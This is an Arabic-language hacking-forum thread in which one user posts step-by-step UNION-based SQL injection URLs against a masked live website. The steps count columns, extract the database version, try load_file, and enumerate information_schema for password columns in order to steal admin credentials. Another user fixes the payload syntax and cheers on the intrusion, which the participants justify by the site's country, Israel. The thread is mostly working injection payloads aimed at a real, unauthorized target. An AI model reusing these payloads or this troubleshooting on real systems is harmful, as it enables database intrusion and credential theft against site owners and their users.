:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   ثغرة حقن وجعت رااسي (http://www.vbspiders.com/vb/t20033.html)

T-72 09-14-2009 03:41 PM
ثغرة حقن وجعت رااسي
 
كيف الشباب

سؤالي اكيد بسيط بالنسبه الكن

رح اتركن مع الخطوات

http://********/etemplate.php?id=58 موقع مصاب


.................................................. .............................................


عدد الاعمده http://*******/etemplate.php?id=58+order+by+13


.................................................. ................................................


نفذت هاد الامر


http://******/etemplate.php?id=58+an...lect+1,2,3,4,5 ,6,7,8,9,10,11,12,13


ظهر العامود الخامس مصاب


.................................................. .................................................



انتقلت للامر لمعرفه اصدار القاعده

http://******/etemplate.php?id=58+an...lect+1,2,3,4,v ersion(),6,7,8,9,10,11,12,13


ظهر الاصدار 5.0.45-community-nt


.................................................. .................................................. ..........................


انتقلت للامر لفحص السيرفر load_file('/')

http://****/etemplate.php?id=58+and+...select+1,2,3,4, load_file('/'),6,7,8,9,10,11,12,13


ظهر خطأ ؟؟؟؟


طنشت الخطة هي



.................................................. .................................................. .......


انتقلت للامر

http://******/etemplate.php?id=58+an...lect+1,2,3,4,c oncat(table_name,0x3a,column_name,0x3a,table_schem a),6,7,8,9,10,11,12,13+from+information_schema.col umns


ظهر عواميد اليوزر و الباس

CHARACTER_SETS:CHARACTER_SET_NAME:information_sche ma




.................................................. .................................................


انتقلت للامر التالي لاجيب عامود الباسورد

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

طبعا كلمة pas مشفره تشفير mysql char


بعد تنفيذ الامر يظهر الخطأأ




لهون وصلت وم عاد فيي اتحرك خطوه


والحل ي شباب

شو المشكله وكيف فيني كمل



حاسس حالي صرت قريب من اسم الادمن والباسوورد


:00001793[1]: > مبسوط


الحل ي شباب



بر[ب]

KaLa$nikoV 09-15-2009 11:36 AM
كيف وضعت الامر ادناه بالحقنه

اقتباس:


انتقلت للامر التالي لاجيب عامود الباسورد

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

طبعا كلمة pas مشفره تشفير mysql char
كل خطواتك تمام بتمام
بس هذه الخطوه ما وضحتها انت كيف عملتها
اشي تاني يا ريت لو تضع الموقع لحتا نقدر نساعدك اكثر ولا تخاف ع الموقع
ما حد يخترقه قبلك ان شاء الله

T-72 09-15-2009 10:50 PM
انا فعلا خايف حدا يخترقو قبلي

بس ملاحظه قبل م اخترقو
رح اعرف طبيعت الموقع

ازا كان يستاهل الاختراق ولا لا

وهي بتركا الك تقرر

لانو الموقع البلد : اسرائيل

رح كملك شو عملت انا
من النقطه اللي م فهمتها انتا

لاعرف العامود والجدول طبقت

الامر التالي

http://******/etemplate.php?id=58+an...E+LIKE+CHAR(37, 112, 97, 115, 37)

T-72 09-15-2009 11:05 PM
ع فكرا


كل المواقع اللي حاولت فيها

صادفتني نفس المشكله


يعني بوصل لهون وم عاد اتقدم ولا خطوه


اكيد في خطأأ
رايح عن باالي

ي ريت تشرحي باقي الخطوات كيف


ناطر ردك بفارغ الصبر


بر[ب]

KaLa$nikoV 09-16-2009 12:07 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة ريتشل كوري (المشاركة 70115)
انا فعلا خايف حدا يخترقو قبلي


[url]http://******/etemplate.php?id=58+and+1=0+union+select+1,2,3,4,7 ,6,7,8,9,10,11,12,13+from+information_schema.colum nswhere+CHARACTER_SET_NAME+LIKE+CHAR(37, 112, 97, 115, 37)
خطأك زي ما كنت متوقع

شوف علامه الزائد قبل كلمه where مش موجوده صح
ضيفها وشوف كيف الناتح من عندي


كود PHP:

******/etemplate.php?id=58+and+1=0+union+select+1,2,3,4,7,6,7,8,9,10,11,12,13+from+information_schema.columns+where+CHARACTER_SET_NAME+LIKE+CHAR(371129711537

مبروك الموقع الاسرائيلي يلا واصل اخي


الساعة الآن 08:43 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0